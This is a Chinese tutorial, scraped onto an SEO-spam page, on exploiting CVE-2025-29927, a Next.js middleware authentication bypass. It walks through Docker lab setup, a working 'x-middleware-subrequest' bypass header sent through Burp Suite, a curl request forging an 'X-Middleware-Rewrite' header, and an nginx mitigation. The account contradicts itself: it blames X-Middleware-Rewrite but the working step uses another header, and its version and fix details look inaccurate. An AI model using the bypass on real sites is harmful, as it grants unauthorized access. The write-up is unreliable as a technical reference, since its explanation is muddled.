当前位置: 首页 > wzjs >正文

做网站时遇到的问题武汉网优化seo公司

做网站时遇到的问题,武汉网优化seo公司,阿里巴巴采购网官网,界首做网站前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞&#xff0c;源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部&#xff0c;实现绕过中间件逻辑&#xff0c;访问本应受保护的资源或 API。 影响版本&#xff1a;Next.js < …

前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞,源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部,实现绕过中间件逻辑,访问本应受保护的资源或 API。

影响版本:Next.js < 14.1.4
成因概括:攻击者利用请求头控制中间件行为,重写跳转目标路径,进而绕过路由拦截。

任务一 启动环境

cd next.js/
cd CVE-2025-29927/
docker compose up -d
//3000就是靶机端口

 

 任务二 打开BurpSuite

代理->代理设置->响应拦截规则(勾选)

随便输入一个弱口令 返回的是/login 没有成功

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
//在bp加入一个头部,返回了200成功了

任务三 拓展 | 本地 

import { NextResponse } from 'next/server';
import type { NextRequest } from 'next/server';export function middleware(request: NextRequest) {const token = request.cookies.get('token');if (!token) {return NextResponse.redirect(new URL('/login', request.url));}return NextResponse.next();
}//创建中间件 middleware.ts
curl -i http://localhost:3000/api/admin \-H "X-Middleware-Rewrite: /api/public" \-H "Cookie: token=malicious"
//构造绕过请求,模拟攻击
//原本未登录用户访问 /api/admin 会被跳转到 /login,构造该头部后,成功伪装访问 /api/public,绕过登录校验。

任务四 修复 

//防御措施
proxy_set_header X-Middleware-Rewrite "";
//中间件中加入请求来源验证机制,防止伪造

官方修复版本:14.1.4
GitHub Release Note 

http://www.dtcms.com/wzjs/493332.html

相关文章:

  • 淘宝客导购网站 丢单优化设计电子课本
  • 重庆丰标建设网站新闻发稿平台有哪些?
  • 广州网站搭建费用网络营销有哪些例子
  • 网站建设的具体任务有哪些网站优化seo教程
  • 中企动力 网站推广如何做好一个营销方案
  • 杭州网站优化排名长沙网站优化对策
  • pc网站建设绍兴seo公司
  • wordpress小工具复制推动防控措施持续优化
  • 适合做公司网站的cms哪里注册域名最便宜
  • wordpress 搬站写文章一篇30元兼职
  • 网站开发学什么比较有优势爱站seo工具包官网
  • 网站开发小图标东莞网站建设优化
  • 合肥做网站建设公司河北网站seo地址
  • 网站建设与推广销售户话术学校网站模板
  • 政府网站建设 便捷关键词点击价格查询
  • 网站建设计划方案模板优化关键词的公司
  • 邢台哪个公司做网站好天津外贸seo推广
  • 建网站对企业的作用做广告推广哪个平台好
  • 八年级信息上册如何做网站com天堂网
  • 山东省工程建设信息官方网站网络营销推广平台
  • 360建站网站模板下载
  • 重庆模板网站建设怎么样网站死链检测工具
  • 教育网站建设方案电商sem是什么意思
  • logo网站找人帮忙注册app推广
  • 在线股票交易网站开发武汉网站推广公司
  • 国外图片设计网站有哪些网络推广公司名字大全
  • 医药招商网站建设免费舆情网站下载大全最新版
  • 网站备案多少钱seo品牌推广方法
  • 艾辰做网站做优化关键词
  • 企业做网站需注意什么seo优化博客